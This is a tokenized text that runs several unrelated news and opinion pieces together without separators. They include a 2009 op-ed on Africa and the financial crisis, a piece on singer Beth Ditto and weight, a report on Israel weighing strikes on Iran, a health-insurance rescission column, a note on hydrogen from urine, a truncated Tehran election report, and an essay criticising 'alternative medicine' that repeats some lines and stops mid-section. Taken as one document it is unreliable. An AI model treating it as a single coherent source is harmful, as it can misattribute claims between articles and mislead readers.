These days , a dollar wo n't get you very far in a rich economy .
But in a poor country like the one I come from , Sierra Leone , even half a dollar can save a life or feed an entire family .
Every penny invested in Africa counts today and to secure Africa 's future .
Experts are unanimous : the financial , food and energy crisis will hammer the " bottom billion " – the poorest in some 60 countries that survive on about a dollar a day – the hardest .
Because of the crisis , many African countries are likely to miss the 2015 deadline for the Millennium Development Goal of poverty reduction .
The continent has made some significant socio-economic gains over the last decade .
I 've seen this for myself during recent travels to Benin , Ghana , Ethiopia , Egypt , Namibia , Nigeria , Senegal and South Africa .
These gains include , to name a few : free - market reforms , liberalisation of economies , the steady introduction of pro-business environments , empowerment of women and education .
But most of these gains are now seriously threatened .
The financial crisis has dealt a blow to remittances .
Migrants are losing their jobs or struggling to set aside cash for their relatives back home .
The World Bank 's latest global economic outlook suggests remittances will fall by 5 % to 8 % this year .
But this is just the tip of the iceberg of the tens of millions that can be tracked .
Foreign companies are pulling back capital , drying import and export financing .
Trade is declining .
The unemployment rate , especially among disadvantaged groups – young people and women – is staggering .
In Sierra Leone alone , more than 60 % of the country 's youth are jobless .
A failure to help the " bottom billion " could fuel mass migration and global insecurity .
Ignoring the poorest nations means postponing a much larger crisis which will lead to famine , unrest , and massive migration .
Poverty is also an incubator for diseases , and the flow of legal and illegal migrants will carry them to rich nations .
Poverty is not just " their " problem .
It is " our " problem too .
If developing countries collapse , there will be millions knocking on our front doors , and the first port of call will be Europe .
Such mass migration will severely hurt already strained social relations in some countries and lead to unpredictable consequences .
Only a co-ordinated global response can guarantee that in the long run people from the poorest billion will visit Europe as tourists and business partners , not as asylum seekers .
Africa needs to do its share .
It needs investments to shift away from a dependence on a donor - driven agenda and peasant - driven agriculture , and learn to compete on a global level .
It can generate sustainable growth through industrialisation , and by creating a single market .
It needs to promote production and trade , expand agribusiness and agro-industries , and create wealth and new jobs .
Agribusiness development can stimulate broader economic growth and boost regional trade , while enhancing food security and reducing poverty .
Globalisation has been good to many in the developing world .
At this critical moment , we can't allow this to fade away .
We need to make this a more inclusive process , and make sure that :
• Financial resources keep flowing to Africa and the developing world so they continue integrating into the global economy
• Protectionism is avoided and markets stay open
• The poorest nations can grow out of poverty through trade
• There is good governance of natural resources to fuel broader and inclusive development .
The abundance of relevant experiences from the newly industrialised countries in Asia and elsewhere can show African countries how to galvanise their economies , accelerating the process of wealth creation and poverty reduction on the continent .
And last but not least .
Development without access to energy wo n't happen .
This crisis could help formulate a new approach : increase access to reliable , affordable and renewable energy services for sustainable development and promote energy efficiency to make sure economic growth does not raise energy demand and environmental degradation , including climate change .
Africa has great hydropower potential but only 7 % has been exploited so far .
Africa 's natural gas reserves amount to about 8 % of global reserves .
It has 10 % of global oil reserves .
But it requires major investments to develop both traditional energy means and renewable ones .
It is still unclear exactly how much of the $ 1tn pledged at the London G20 summit will find its way to Africa .
That 's why we need to keep an eye on the figures and keep reminding world leaders of the needs of those in the developing world that live in their shadow .
This will set policy priorities straight , put strategies in place to avert a human catastrophe and help Africa secure its rightful place at the global economic table .
Kandeh K Yumkella is director general of the United Nations Industrial Development Organisation ( UNIDO ) .
Copyright : Project Syndicate , 2009
Built by reader “ Kevin ” for a contest , this computer - controlled alarm clock is touted as the world ’s largest .
To be more specific , he “ mounted a large air cylinder to the head of [ his ] bed and a valve , controlled by a computer , which [ he programmed ] to wake [ him ] up in the morning . ”
Continue reading to see it in action . ”
When Beth Ditto meets Giles Hattersley from the Times of London , the singer whips off her shirt :
" In case you were wondering , these are real , " she says , cupping her boobs .
" But this , " she continues , grabbing a shelf of tummy flab , " is implants . "
She honks with laughter and pulls her top back on .
Advertisement
Hattersley is clearly impressed by Ditto , calling her " fabulous " and writing of when she hugs him :
" The chalky white arms squeezing my back are as delicious and comforting as slabs of freshly baked ciabatta . "
When Hattersley sees Ditto with her top off , he writes :
Rolls and folds topped with an adorable heart - shaped face .
Having never had the least desire to paint , I 'm suddenly overcome with an urge to take up oils and have a bash at capturing the play of light across her love handles .
No wonder she 's a muse to just about every designer going .
Advertisement
Ditto has designed a plus - size collection for UK chain store Evans , but she does n't feel it 's impossible to find anything to wear if you 're over a size 16 .
" I do n't understand all these women who say they feel betrayed by fashion .
A piece of clothing can't talk - it can't tell you that you can't have it - so really , you 're just telling yourself that .
You make yourself the victim , because if you want clothes that bad , then make them yourself .
You have to get creative if you 're fat .
I 'm really good at turning a belt into a necklace , and I can always find a nice pair of earrings . "
G/O Media may get a commission LG 75 " 8 K TV Buy for $ 2150 from BuyDig Use the promo code ASL250
And when it comes to the fashion industry insiders , Ditto knows they 're fickle : " One year Karl Lagerfeld was refusing to make clothes for women of a certain size , and the next year he was asking me to play the Fendi party , " she says .
But Ditto also knows that being fat means certain things : " Fat people should n't do drugs , " she says .
" Fat people should certainly not do cocaine .
It 's not that they 're all unhealthy , but it can be hard on your body , on your heart , so you have to accept you can't do certain things .
I do n't want to die when I'm 38 .
It 's not worth it .
Plus , can you imagine if I was on coke ?
I mean , how much faster can one girl talk ? "
Advertisement
While Ditto seems fully self - aware — and aware of her novelty in the fashion world ( of visiting the runway collections in Paris , she says : " I 'm the only one there who looks like me .
Everyone else just looks the same , so think about the joy of that . " ) — there are those who just wo n't let her be .
Over the weekend , we got an email from a reader who accused us of " promoting " obesity .
Actually , she wrote :
I am stumped and confused as to why you continually promote morbid obesity as a healthy way to live , or a responsible role model …
While I support your position on body - snarking , the issue of Ms. Ditto 's obesity is relevant and deserves attention .
Advertisement
Ugh .
The woman is a creative , fashionable lesbian and singer with lots of things to say — but all anyone ever talks about is her weight .
Is it , in fact , " relevant " ?
Does n't it get enough attention already ?
And let 's be honest :
Is n't there some inherent sexism in focusing on the weight of a woman who is making a living because of her singing and songwriting skills ?
Does every Jack Black interview have to include " relevant " information about his weight ?
Seth Rogen became a star without a svelte physique .
No one cared if we posted about those guys without mentioning their weight , but women must be small and tiny and delicate and therefore feminine , right ?
And let 's not pretend this is a health issue :
We see images of stars smoking and drinking and frighteningly thin , and never get emails about how we 're " promoting " those unhealthy lifestyles .
But when it comes to Beth Ditto's weight , this reader seem to think it 's her business , her prerogative , to make sure we know that Ditto is " unhealthy " and not fit to be a role model .
May we remind you that it 's impossible to look at someone and determine how healthy — or unhealthy — he or she is ?
You can't see genetic material ( fat mom / fat dad ) , lungs , cardio - pulmonary system , decaying liver or gingivitis in a photograph .
Even Steven N. Blair , one of the nation 's leading experts on the health benefits of exercise , is short and fat ; he runs every day .
Unlike a decaying liver or tar - filled lungs , you can see Beth Ditto 's fat — which makes it easy for this reader — and others like her — to suggest that she feel ashamed .
In any case , there 's " promotion , " and there 's a feeling of relief that a talented , outspoken woman with an under - represented , often overlooked body type is in the media .
Can you spot the difference ?
Advertisement
The Brilliance Of Beth Ditto [ Times Of London ]
Related : Kate Harding Takes On The Body Mass Index
Losing Patience , Not Weight [ NY Times ]
Prime Minister Benjamin Netanyahu and his top deputies have not formally asked for U.S. aid or permission for possible military strikes on Iran ’s nuclear program , fearing the White House would not approve , two Israeli officials said .
One senior Israeli official , who requested anonymity because of the sensitivity of the subject , told The Washington Times that Mr. Netanyahu determined that “ it made no sense ” to press the matter after the negative response President Bush gave Mr. Netanyahu ’s predecessor , Ehud Olmert , when he asked early last year for U.S. aid for possible military strikes on Iran .
Israel is increasingly nervous that Iran is developing the capability to build a nuclear weapon , an intention Iran denies .
However , Israel is unlikely to attack Iran without at least tacit U.S. approval , in part because that would require cooperation from the United States .
At the very least , Israel likely would have to fly over Iraqi airspace , which is still effectively controlled by the U.S. Air Force .
Vice President Joseph R. Biden Jr. refused during a television appearance Sunday to say whether the U.S. would give Israel overflight rights for such an attack , but said it was Israel ’s “ sovereign right ” to attack Iran if it considers the Iranian nuclear program an existential threat .
“ There is no pressure from any nation that ’s going to alter our behavior as to how to proceed , ” he told ABC ’s “ This Week . ”
Mr. Biden said the U.S. was pursuing a diplomatic route , but , “ If the Netanyahu government decides to take a course of action different than the one being pursued now , that is their sovereign right to do that .
That is not our choice . ”
Despite the political upheaval in Iran since the disputed June 12 presidential elections there , the Obama administration says it is still seeking negotiations with Iran on the nuclear issue .
In early May , as The Times reported last month , the White House sent a letter to Iranian Supreme Leader Ayatollah Ali Khamenei , asking for talks and improved relations .
White House officials have declined to confirm or deny the existence of the letter , and they also declined to comment on the substance of discussions between U.S. and Israeli officials on Iran .
A senior Israeli official said that Israel has not asked for U.S. aid or permission because the Netanyahu government does n’t want to risk being told “ no . ”
“ There was a decision not to press this because it was probably inadequate for the engagement policy and what we know about Obama ’s approach to Iran , ” he said .
Mr. Netanyahu ’s private diplomatic posture differs from his public stance during his campaign .
He ran for office earlier this year on a promise to do whatever was necessary to prevent Iran from obtaining nuclear weapons .
In March , Mr. Netanyahu told the Atlantic ’s Jeffrey Goldberg that stopping Iran from gaining nuclear weapons was one of two great challenges facing the Obama presidency .
He also implied in the interview that Israel would act if the United States did not .
Kenneth Pollack , acting director for the Saban Center for Middle East policy at the Brookings Institution , said “ the Israelis have made it clear that they are going to allow this diplomatic process to work out , and even if they conclude that it has failed , they do n’t want to attack Iran .
But the problem is they may feel they have no other choice but to do so . ”
Mr. Pollack added that “ Israel has a real problem with the distance from Israeli air bases to Iranian targets .
And the shortest route from Israel to Iran is over Jordan and Iraq .
And the United States is responsible for Iraqi airspace . ”
David Sanger of the New York Times reported in January that Israel asked the Bush administration for overflight rights and other technical assistance for a possible bombing campaign against Iran but was rebuffed .
Instead , Mr. Sanger reported , the Bush administration stepped up clandestine operations aimed at disrupting Iran ’s nuclear program and other scientific infrastructure .
Thus far , the Israelis have opted to hew closely to President Obama ’s line on Iran .
Last week , Israel ’s national security adviser , Uzi Arad , met with his American counterparts in a meeting of a special working group on Iran .
The Washington Times first reported the formation of such a working group in May when Mr. Netanyahu met with Mr. Obama at the White House .
Iran has not responded to U.S. overtures for talks , and the Obama administration has offered few specifics about the consequences to Iran if the U.S. offer is spurned .
Secretary of State Hillary Rodham Clinton has said there would be “ crippling sanctions ” but has offered no details .
Mr. Obama told Mr. Netanyahu that he would assess the diplomatic - engagement strategy at the end of the calendar year .
Reports in the Israeli press over the weekend predicted that the White House will not press for new international sanctions this week at a meeting in Italy of the Group of Eight industrialized nations .
David Makovsky , a senior fellow at the Washington Institute for Near East Policy , said that “ while Israel is the only country existentially threatened by Iran , it understands that American interests are impacted .
As such , I do n’t think Israel would attack Iran out of the blue . ”
Mr. Makovsky is the co-author of “ Myths , Illusions and Peace , ” with Dennis Ross , now a senior U.S. policymaker on Iran and the broader Middle East at the White House National Security Council .
Danielle Pletka , vice president for foreign and defense policy studies at the American Enterprise Institute , said that if Israel were to give the United States advance notice of its intention to strike Iran , it would be risking a “ red light . ”
“ That could force the president to choose Israel ’s security over his desired rapprochement with Iran .
An ugly and dangerous outcome for all concerned , ” she said .
Iran ’s nuclear program is dispersed , and parts of it may be hidden , making it difficult for Israel or the United States to destroy all the installations .
In addition , a strike could provoke Iranian retaliation against both Israeli and U.S. targets , including U.S. troops in Iraq and Afghanistan .
Iran might also attack Arab oil installations or U.S. ships in the Persian Gulf .
Adm . Mike Mullen , chairman of the Joint Chiefs of Staff , said Sunday on CBS ’ “ Face the Nation ” that a U.S. strike on Iran would be “ very destabilizing , ” as would a nuclear Iran .
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
Editor 's note : Paul Begala , a Democratic strategist and CNN political contributor , was a political consultant for Bill Clinton 's presidential campaign in 1992 and was counselor to Clinton in the White House .
He is an affiliated professor at Georgetown University 's Public Policy Institute and an adviser to the Service Employees International Union , which supports President Obama 's health care plan .
Paul Begala says health care is n't getting attention it deserves -- and Obama administration is partly to blame .
( CNN ) --
You probably have never heard of Robin Beaton , and that 's what 's wrong with the debate over health care reform .
Beaton , a retired nurse from Waxahachie , Texas , had health insurance -- or so she thought .
She paid her premiums faithfully every month , but when she was diagnosed with aggressive breast cancer , her health insurance company , Blue Cross , dumped her .
The insurance company said the fact that she had seen a dermatologist for acne , who mistakenly entered a notation on her chart that suggested her simple acne was a precancerous condition , allowed Blue Cross to leave her in the lurch .
Beaton testified before a House subcommittee this week .
So did other Americans who thought they had insurance but got the shaft .
As Karen Tumulty of Time magazine ( who has been the journalistic conscience of health care coverage ) wrote , other witnesses included :
" Peggy Raddatz , whose brother Otto Raddatz lost his insurance coverage right before he was scheduled to receive an expensive stem - cell transplant to treat his lymphoma .
Why ?
Because Fortis Insurance Company discovered his doctor had found gall stones and an aneurysm on a CT scan -- conditions that had nothing to do with his cancer , that never bothered him and that he was n't even aware of .
And Jennifer Wittney Horton of Los Angeles , California , whose coverage was canceled because she had been taking a drug for irregular menstruation .
Now , she can't get coverage anywhere else .
' Since my rescission , I have had to take jobs that I do not want , and put my career goals on hold to ensure that I can find health insurance , ' she told the subcommittee . "
The subcommittee 's chairman , Democrat Bart Stupak of Michigan , called the hearing to highlight the obnoxious and unethical practice called rescission .
His researchers produced performance reviews of insurance company bureaucrats who were praised and rewarded for kicking people off their coverage .
Then Stupak asked three health insurance executives the big question :
Will your company pledge to end the practice of rescission except in cases of intentional fraud ?
All three health insurance executives said no .
It was as dramatic as congressional testimony gets .
Yet it got no airtime on the networks , nor , as far as I can tell , on cable news , although CNN.com did run a story .
Time 's Tumulty was all over it , as was Lisa Girion of The Lost Angeles Times .
But the story did not make The New York Times .
Nor The Washington Post , which found space on the front page the morning after the hearing for a story on the cancellation of Fourth of July fireworks in Shippensburg , Pennsylvania , but not a story on the cancellation of health insurance for deathly ill Americans who've paid their premiums .
Stupak , and the Energy and Commerce Committee chairman , Henry Waxman , D - California , did their job .
Why did n't the media do its ?
Why were the outrages uncovered by Stupak and Waxman un-covered by most of the media ?
Maybe because the Obama White House drew the spotlight away from health care .
They 'd diverted the media to cover Obama 's proposed reforms of the financial regulatory system .
On the last day of the 1992 Clinton - Gore campaign , we had the media A - Team traveling with us .
So I made it my business to sit next to David Gergen , then with U.S. News & World Report but a former top aide to Presidents Nixon , Ford and Reagan ( at that point -- little did I know he would soon be working for President Clinton ) .
I had never seen a communications shop as effective as Reagan's , and I was n't going to miss an opportunity to learn from a master .
Gergen told me an anecdote I still remember vividly .
In the opening months of the Reagan presidency , it was the economy , stupid .
America was mired in a recession , and President Reagan wanted to focus the nation 's attention on his economic plan .
But Secretary of State Al Haig had other ideas .
The State Department had nothing to do with the economy , and Haig had ambitious plans .
So , Gergen told me , Haig got a bunch of good press , advocating for intercepting Cuban gun runners ( if memory serves ) .
You would think a staunch anti-Communist such as Reagan would have been happy .
But , no .
Reagan 's chief of staff , James Baker , upbraided Haig for diverting media attention away from the primary goal : passing the president 's economic plan .
I never forgot Gergen 's story -- especially when the Clinton White House wandered off message as it tried to pursue fundamental reform of the health care system .
The economic plan eclipsed health care for much of Clinton 's first year .
As did NAFTA .
And the crime bill , which included the Brady Bill and other gun control measures .
And do n't forget gays in the military .
And a foreign policy crisis in Somalia -- and another in Haiti .
And another in Russia .
Clinton gave his health care address to the Congress on September 23 , 1993 .
October was supposed to be " Health Care Month " in the White House , but so many other issues got in the way that he had just one public event focused on health care in the entire month -- just one .
I understand that Obama 's White House team has to juggle a lot of issues ; I 've been there .
And I 'm sure the Obama financial reforms have merit .
But if the president wants to pass his ambitious health care reform , he 's going to have to put other , worthy , ideas on the back burner and shine the media spotlight on the plight of people like Robin Beaton .
The opinions expressed in this commentary are solely those of Paul Begala .
All About Health Care Policy • Barack Obama • Cancer
An Ohio University professor has created a catalyst that can extract hydrogen from urine .
And that means , according to Wired 's Autotopia , Botte has figured out how to power a car with pee .
Garardine Botte claims the device uses significantly less energy than is needed to extract hydrogen from water and says it could power hydrogen fuel cell vehicles in the near future .
Her electrolyzer uses a nickel - based electrode to extract hydrogen from urea ( NH2 ) 2CO , the main component in urine .
Hydrogen is less tightly bound to the nitrogen in urea than to the oxygen in water , so the electrolyzer needs just 0.37 volts across the cell to oxidize the urea , according to Botte .
That ’s less than half the amount of energy in an AA battery and considerably less than the 1.23 volts needed to split water .
One of hydrogen ’s biggest stumbling blocks to use as an alternative fuel is the amount of energy needed to produce it .
And then there ’s the matter of distributing it .
Botte says her gadget eliminates such problems because it ’s small enough to integrate into an automobile .
Urine is also readily available — your body produces two to three liters of it each day , and it is the most abundant form of waste on the planet .
We could treat waste water while fueling our cars .
“ Urea is the same stuff we use to fertilize our flower beds .
It ’s a solid that dissolves in water and is therefore easy to move , ” Botte told Wired.com .
“ An electrolyzer built into a car would eliminate the need for a hydrogen storage tank , and with the right partnership , I believe we could have pee-powered cars capable of 60 miles per gallon on the road within a year . ”
Continue reading →
TEHRAN 
The leading candidates are accusing each other of corruption , bribery and torture .
The wife of the strongest challenger to President Mahmoud Ahmadinejad has threatened to sue him for defaming her .
And every night , parts of the capital become a screaming , honking bacchanal , with thousands of young men dancing and brawling in the streets until dawn .
The presidential campaign , now in its final week , has reached a level of passion and acrimony almost unheard - of in Iran .
In part , that appears to be because of a surge of energy in the campaign of Mir Hussein Moussavi , a reformist who is the leading contender to defeat Mr. Ahmadinejad in the election , set for Friday .
Rallies for Mr. Moussavi have drawn tens of thousands of people in recent days , and a new unofficial poll suggests his support has markedly increased , with 54 percent of respondents saying they would vote for him compared with 39 percent for Mr. Ahmadinejad .
But many Iranians say the campaign ’s raucous tone is due largely to Mr. Ahmadinejad ’s unexpectedly fierce rhetorical attacks , which have infuriated his rivals and their supporters , and drawn some blistering ripostes .
At liquid - nitrogen temperature , about – 320 °F , mercury acts like any other metal :
You can hammer it , file it , saw it .
( It wo n't shatter like other liquid - nitrogen - frozen items because there 's not enough moisture inside . )
Watching it solidify is exactly like watching tin harden from a molten state .
As the atoms go from liquid to solid crystal form , you see the surface pucker .
And because mercury , like most metals , shrinks when it solidifies , you see the surface sink in areas , forming a patchwork characteristic of cast metal .
During the 1990s , “ alternative medicine , ” became established as a politically correct term for questionable practices formerly labeled quack and fraudulent .
The terms “ complementary medicine . ” and “ integrative medicine , ” are also used in the same way .
Most media reports on these topics contain no critical evaluation and feature the views of proponents and their satisfied clients .
Loose Definitions Cause Confusion
To avoid confusion , “ alternative ” methods should be classified as genuine , experimental , or questionable .
Genuine alternatives are comparable methods that have met science - based criteria for safety and effectiveness .
alternatives are comparable methods that have met science - based criteria for safety and effectiveness .
Experimental alternatives are unproven but have a plausible rationale and are undergoing responsible investigation .
The most noteworthy is use of a 10 % - fat diet for treating coronary heart disease .
alternatives are unproven but have a plausible rationale and are undergoing responsible investigation .
The most noteworthy is use of a 10 % - fat diet for treating coronary heart disease .
Questionable alternatives are groundless and lack a scientifically plausible rationale .
The archetype is homeopathy , which claims that “ remedies ” so dilute that they contain no active ingredient can exert powerful therapeutic effects .
Some methods fit into more than one category , depending on the claims made for them .
Blurring these distinctions enables promoters of quackery to argue that because some practices labeled “ alternative ” have merit , the rest deserve equal consideration and respect .
Enough is known , however , to conclude that most questionable “ alternatives ” are worthless .
An even better way to avoid confusion is to sort methods into three groups : ( 1 ) those that work , ( 2 ) those that do n’t work , and ( 3 ) those we are not sure about .
Most methods described as “ alternative ” fall into the second group .
A 1998 editorial in the Journal of the American Medical Association made the same point in another way :
There is no alternative medicine .
There is only scientifically proven , evidence - based medicine supported by solid data or unproven medicine , for which scientific evidence is lacking .
Whether a therapeutic practice is “ Eastern ” or “ Western , ” is unconventional or mainstream , or involves mind - body techniques or molecular genetics is largely irrelevant except for historical purposes and cultural interest .
We recognize that there are vastly different types of practitioners and proponents of the various forms of alternative medicine and conventional medicine , and that there are vast differences in the skills , capabilities , and beliefs of individuals within them and the nature of their actual practices .
Moreover , the economic and political forces in these fields are large and increasingly complex and have the capability for being highly contentious .
Nonetheless , as believers in science and evidence , we must focus on fundamental issues — namely , the patient , the target disease or condition , the proposed or practiced treatment , and the need for convincing data on safety and therapeutic efficacy [ 1 ] .
Arnold Relman , M.D. former editor of The New England Journal of Medicine , expressed similar thoughts about the term “ integrative medicine ” :
There are not two kinds of medicine , one conventional and the other unconventional , that can be practiced jointly in a new kind of “ integrative medicine . ”
Nor , as Andrew Weil and his friends also would have us believe , are there two kinds of thinking , or two ways to find out which treatments work and which do not .
In the best kind of medical practice , all proposed treatments must be tested objectively .
In the end , there will only be treatments that pass that test and those that do not , those that are proven worthwhile and those that are not [ 2 ] .
John Farley , Ph.D. , professor of physics at the University of Nevada , Las Vegas , has commented :
“ Integrative ” medicine is purportedly combining alternative and mainstream approaches to medicine .
The claim is that integrative medicine provides the best of both approaches .
This may sound reasonable , but actually it is not .
Suppose that the “ integrative ” approach were to spread beyond medicine , and were to be more broadly adopted by other disciplines in the sciences .
The biologists would “ integrate ” creationism with Darwinian evolution , while the chemists would integrate alchemy into modern scientific chemistry .
The geologists would integrate the belief that the world is only 6000 years old ( and flat ) with modern dating of rocks .
Physicists would integrate perpetual motion machines with the conservation of energy and the laws of thermodynamics .
And the astronomers would integrate astrology and astronomy .
Of course , this is ridiculous .
It ’s not a good idea to integrate nonsense with valid scientific knowledge
[ 3 ] .
Edzard Ernst , M.D. , Ph.D. has expressed alarm about the infiltration of “ integrative medicine ” into academic medical centers :
Integrative medicine has been defined as “ medicine that reaffirms the relationship between practitioner and patient , focuses on the whole person , is informed by evidence , and makes use of all appropriate therapeutic approaches , health care professionals ( conventional and complementary ) to achieve optimal health and healing . ”
This and other definitions do not really tell us which therapies are included under this umbrella term .
They merely seem to hijack fundamental principles ( e.g. holism , therapeutic relationship , patient - centered medicine , EBM ) of any type of good health care .
. ..
Integrative medicine , it is claimed , “ enhances the quality of primary health care through its provision of patient - centered , effective and safe healthcare . ”
My humble analysis , however , confirms that it is a smokescreen behind which enthusiasts of dubious practices try to incorporate their unproven therapies into routine health care [ 4 ] .
The “ alternative movement ” is part of a general societal trend toward rejection of science as a method of determining truths .
This movement embraces the postmodernist doctrine that science is not necessarily more valid than pseudoscience [ 5 ] .
In line with this philosophy , “ alternative ” proponents assert that scientific medicine ( which they mislabel as allopathic , conventional , or traditional medicine ) is but one of a vast array of health - care options .
“ Alternative ” promoters often gain public sympathy by portraying themselves as a beleaguered minority fighting a self - serving , monolithic “ Establishment . ”
Some “ alternative ” promoters refer to their practice as “ functional , ” “ holistic , ” or “ biological ” medicine ( or dentistry ) .
Like “ alternative , “ complementary , ” and “ integrative , ” these are merely marketing terms .
Many claim to “ treat the undelying cause of disease rather than treating symptoms . ”
In an essay about “ fucntional medicine , ” ( “ FM ” ) , David Gorski , M.D. , stated :
All the claims that FM treats the “ underlying cause ” of disease are revealed to be delusions when you just look at what FM doctors really do when treating cancer patients .
. . .
It takes “ making it up as you go along ” to a whole new level , and that ’s not a good thing in medicine [ 7 ] .
The Rules of Science
Under the rules of science , people who make the claims bear the burden of proof .
It is their responsibility to conduct suitable studies and report them in sufficient detail to permit evaluation and confirmation by others .
Instead of subjecting their work to scientific standards , promoters of questionable “ alternatives ” would like to change the rules by which they are judged and regulated .
“ Alternative ” promoters may give lip service to these standards .
However , they regard personal experience , subjective judgment , and emotional satisfaction as preferable to objectivity and hard evidence .
Instead of conducting scientific studies , they use anecdotes and testimonials to promote their practices and political maneuvering to keep regulatory agencies at bay .
As noted in a 1998 New England Journal of Medicine editorial :
What most sets alternative medicine apart . . . is that it has not been scientifically tested and its advocates largely deny the need for such testing .
By testing , we mean the marshaling of rigorous evidence of safety and efficacy , as required by the Food and Drug Administration ( FDA ) for the approval of drugs and by the best peer - reviewed medical journals for the publication of research reports .
Of course , many treatments used in conventional medicine have not been rigorously tested , either , but the scientific community generally acknowledges that this is a failing that needs to be remedied .
Many advocates of alternative medicine , in contrast , believe the scientific method is simply not applicable to their remedies .
. . .
Alternative medicine also distinguishes itself by an ideology that largely ignores biologic mechanisms , often disparage modern science , and relies on what are purported to be ancient practices and natural remedies ( which are seen as somehow being simultaneously more potent and less toxic than conventional medicine ) .
Accordingly , herbs or mixtures of herbs are considered superior to the active compounds isolated in the laboratory .
And healing methods such as homeopathy and therapeutic touch are fervently promoted despite not only the lack of good clinical evidence of effectiveness , but the presence of a rationale that violates fundamental scientific laws — surely a circumstance that requires more , rather than less , evidence [ 7 ] .
The AMA Archives of Dermatology has published the parallel views of a German physician :
When deliberating on the essence of alternative medicine we should simultaneously reflect on the intellectual and moral basis of regular medicine .
. . . ( 1 ) alternative and regular medicine are speaking different languages ; ( 2 ) alternative medicine is not unconventional medicine ; ( 3 ) the paradigm of regular medicine is rational thinking ; ( 4 ) the paradigm of alternative medicine is irrational thinking ; ( 5 ) the present popularity of alternative medicine can be explained by romanticism ; ( 6 ) some concepts of alternative medicine are falsifiable and others are not ; ( 7 )
alternative medicine and evidence - based medicine are mutually exclusive ; ( 8 ) the placebo effect is an important factor in regular medicine and the exclusive therapeutic principle of alternative medicine ; ( 9 ) regular and alternative medicine have different aims : coming of age vs faithfulness ; ( 10 ) alternative medicine is not always safe ; ( 11 ) alternative medicine is not economic ; and ( 12 ) alternative medicine will always exist .
The fact that alternative methods are presently an integral part of medicine as taught at German universities , as well as of the physician ’s fee schedule , represents a collective aberration of mind that hopefully will last for only a short time [ 8 ] .
When someone feels better after having used a product or procedure , it is natural to credit whatever was done .
This is unwise , however , because most ailments resolve by themselves and those that persist can have variable symptoms .
Even serious conditions can have sufficient day - to - day variation to enable useless methods to gain large followings .
In addition , taking action often produces temporary relief of symptoms due to a placebo effect .
This effect is a beneficial change in a person ’s condition that occurs in response to a treatment but is not due to the pharmacologic or physical aspects of the treatment .
Belief in the treatment is not essential , but the placebo effect may be enhanced by such factors as faith , sympathetic attention , sensational claims , testimonials , and the use of scientific - looking charts , devices , and terminology .
Another drawback of individual success stories is that they do n’t indicate how many failures might occur for each success .
People who are not aware of these facts tend to give undeserved credit to “ alternative ” methods .
The fact that an “ alternative ” method may exert a placebo effect that relieves symptoms is not sufficient reason to justify its use .
Therapy should be based on the ability to alter abnormal physiology and not on the ability to elicit a less predictable placebo effect .
Placebo therapy is inherently misleading and can make patients believe something is effective when it is not .
Without controlled clinical trials , any treatment that is used could receive credit for the body ’s natural recuperative ability .
Medical “ facts ” are determined through a process in which hundreds of thousands of scientists share their observations and beliefs .
Editors and editorial boards of scientific journals play an important role by screening out invalid findings and enabling significant ones to be published .
Expert panels convened by government agencies , professional groups , voluntary health agencies , and other organizations also contribute to this effort .
When controversies arise , further research can be devised to settle them .
Gradually , a shared set of beliefs is developed that is considered scientifically accurate .
Science versus Vitalism
Science assumes that in order to develop a coherent body of knowledge , it is necessary to assume that supernatural powers do not exist or , if they do exist , they do not interfere .
If such interference were possible , then all attempts at controlled experimentation would be either impossible or pointless .
Many “ alternative ” approaches are rooted in vitalism , the concept that bodily functions are due to a vital principle or “ life force ” distinct from the physical forces explainable by the laws of physics and chemistry and detectable by scientific instrumentation .
Practitioners whose methods are based on vitalistic philosophy maintain that diseases should be treated by “ stimulating the body ’s ability to heal itself ” rather than by “ treating symptoms . ”
Homeopaths , for example , claim that illness is due to a disturbance of the body ’s “ vital force , ” which they can correct with special remedies , while many acupuncturists claim that disease is due to imbalance in the flow of “ life energy ” ( chi or Qi ) , which they can balance by twirling needles in the skin .
Many chiropractors claim to assist the body ’s “ Innate Intelligence ” by adjusting the patient ’s spine .
Naturopaths speak of “ Vis Medicatrix Naturae . ”
Ayurvedic physicians refer to “ prana . ”
And so on .
The “ energies ” postulated by vitalists cannot be measured by scientific methods .
Although vitalists often pretend to be scientific , they really reject the scientific method with its basic assumptions of material reality , mechanisms of cause and effect , and testability of hypotheses .
They regard personal experience , subjective judgment , and emotional satisfaction as preferable to objectivity and hard evidence .
Some “ alternative ” proponents are physicians who have strayed from scientific thought .
The factors that motivate them can include delusional thinking , misinterpretation of personal experience , financial considerations , and pleasure derived from notoriety and / or patient adulation .
Overclaim and Puffery
“ Alternative ” promoters often claim that their approach promotes general health and is cost - effective against chronic health problems .
In a 1997 article , for example , the American Holistic Association ’s president claimed that various “ basic healthy habits ” would “ tap a well - spring of physical energy experienced as a state of relaxed vitality . ” [ 9 ]
In addition to exercising , eating a nutritious diet , and getting sufficient sleep , the list includes abdominal breathing ; taking “ a full complement of antioxidants and supplements ; and “ enhancing the body ’s ability to receive and generate bioenergy ” through regular acupuncture treatments , acupressure , healing touch , craniosacral therapy , qigong , and several other nonstandard modalities .
As far as I know , there is no published evidence that “ alternative ” practitioners are more effective than mainstream physicians in persuading their patients to improve their lifestyle .
Nor have any vitalistic approaches been proven effective or cost - effective against any disease .
Former National Council Against Health Fraud president William T. Jarvis , Ph.D. , has noted :
Some techniques referred to as “ alternative ” may be appropriately used as part of the art of patient care .
Relaxation techniques and massage are examples .
But procedures linked to belief systems that reject science itself have no place in responsible medicine .
Useless procedures do n’t add to the outcome , just to the overhead .
Rosemary Jacobs , a consumer activist who operates a Web site that debunks colloidal silver , has made some penetrating observations with which I agree :
“ Alternative therapy ” is a marketing term that should not be permitted .
All the public wants is safe , effective and efficient .
They also want objective standards of measurement used to determine what is safe , effective and efficient .
There is a general consensus as to what those standards are among scientists and rational people for most therapies .
In other words , for most diseases and conditions , experts know what works , what does n’t work , what is unknown and what falls into a gray area — what may work but the jury is still out .
Anyone wanting to practice engineering or architecture has to abide by objective standards .
I think that anyone who wants to practice medicine professionally should have to so too .
People who believe that personal experience is the best way to evaluate drugs and therapies should have to identify themselves as spiritualists or New Age religious practitioners but not as medical practitioners .
They should be forced to admit to themselves and to the world that they reject science and objective standards , and they should never be allowed to sell the drugs they prescribe [ 10 ] .
The NIH Debacle
The National Institutes of Health ’s involvement with “ alternative medicine ” began in 1991 with creation of a small entity became the Office of Alternative Medicine ( OAM ) a few years later .
Its creation was spearheaded by promoters of dubious cancer therapies who wanted more attention paid to their methods .
Most of its advisory panel members were promoters of “ alternative ” methods , and none of its publications criticized any method .
